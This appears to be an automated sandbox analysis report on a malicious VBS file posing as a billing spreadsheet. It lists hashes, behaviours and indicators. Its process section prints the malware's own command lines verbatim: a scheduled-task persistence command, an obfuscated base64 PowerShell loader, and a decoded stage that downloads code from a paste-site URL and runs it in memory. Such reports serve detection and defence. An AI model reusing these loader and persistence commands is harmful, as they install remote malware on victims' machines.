Resubmissions
12/12/2023, 15:39
231212-s3zdzsfehm 10
12/12/2023, 15:32
231212-syk1ssfdgp 10
12/12/2023, 15:28
231212-swhgwshad3 10
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system -
submitted
12/12/2023, 15:32
Static task
static1
Behavioral task
behavioral1
Sample
Billed-report2023xls.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Billed-report2023xls.vbs
Resource
win10v2004-20231130-en
General
-
Target
Billed-report2023xls.vbs
-
Size
135KB
-
MD5
81df0d95d784fd74d88174859e7ab470
-
SHA1
03aed26ac800ea6c492e64fb5fd5ab928b3564ee
-
SHA256
da59502967c26be14e52f229feb80beb4672ad5454eb943969f1da9a21815886
-
SHA512
4b76ec39584ab792f17dee8e435834ac50c3c9285fc30fee5a65b32ebf54fc3e918032caeb7f550f0d5d577faf45a8613ec040c6e318afcc0be1f7a47dbd4689
-
SSDEEP
3072:8DupClYAAAA/AAAA4AAAA4AAAA4AAAA4AAAA4AAAAFsx7YX2ojcAAAA4AAAA4AA3:3
Malware Config
Extracted
https://textbin.net/raw/ezjmofz3s6
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2108 | schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
3068 | powershell.exe
2600 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3068 | powershell.exe
Token: SeDebugPrivilege | 2600 | powershell.exe
-
Suspicious use of WriteProcessMemory 12 IoCs
description | pid | Process | procid_target
PID 2240 wrote to memory of 2172 | 2240 | WScript.exe | 29
PID 2240 wrote to memory of 2172 | 2240 | WScript.exe | 29
PID 2240 wrote to memory of 2172 | 2240 | WScript.exe | 29
PID 2240 wrote to memory of 2108 | 2240 | WScript.exe | 30
PID 2240 wrote to memory of 2108 | 2240 | WScript.exe | 30
PID 2240 wrote to memory of 2108 | 2240 | WScript.exe | 30
PID 2240 wrote to memory of 3068 | 2240 | WScript.exe | 32
PID 2240 wrote to memory of 3068 | 2240 | WScript.exe | 32
PID 2240 wrote to memory of 3068 | 2240 | WScript.exe | 32
PID 3068 wrote to memory of 2600 | 3068 | powershell.exe | 34
PID 3068 wrote to memory of 2600 | 3068 | powershell.exe | 34
PID 3068 wrote to memory of 2600 | 3068 | powershell.exe | 34
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs" 1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn mi /f 2⤵ PID:2172
-
-
C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn mi /tr "C:\Users\Admin\AppData\Local\Temp\mi.vbs" /sc minute /mo mi 2⤵
- Creates scheduled task(s)
PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $dgUdYL = 'J▒Bu▒Hg▒d▒Bv▒Ho▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒B3▒G0▒Z▒B0▒H▒▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HY▒ZQBi▒Gg▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB0▒GU▒e▒B0▒GI▒aQBu▒C4▒bgBl▒HQ▒LwBy▒GE▒dw▒v▒GU▒egBq▒G0▒bwBm▒Ho▒MwBz▒DY▒Jw▒p▒C▒▒KQ▒g▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dgBl▒GI▒a▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒TQBh▒HI▒YQBj▒GE▒aQBi▒G8▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒TQBz▒HE▒QgBJ▒GI▒WQ▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒d▒BU▒FM▒VQBY▒C8▒Z▒▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Hc▒bQBk▒HQ▒c▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒bgB4▒HQ▒bwB6▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $dgUdYL.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs');powershell -command $KByHL;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$nxtoz = '034';$wmdtp = 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs';[Byte[]] $nvebh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($nvebh).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/tTSUX/d/ee.etsap//:sptth' , $wmdtp , '____________________________________________-------', $nxtoz, '1', 'Roda' ));"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PDNJ79HV0KCUCC0YYC7.temp
Filesize 7KB
MD5 9292eff7e0e514f0cd05283ce51b968c
SHA1 4deb0c19e0ec9f2ce726e3ebe97b5dbe10e92e68
SHA256 447f6fc85471d6cd111939947e3dd4b0f6da2d5e6b745b640bf72f29a8bdcfd9
SHA512 e71df3f40e3a2a32ae4d3c65178c07004527d583c4179f603c47eac92e56f478eaffea06ecb792492bfe24ee2e90a0806c8ccffbc0bf257774a0511c4ca318ea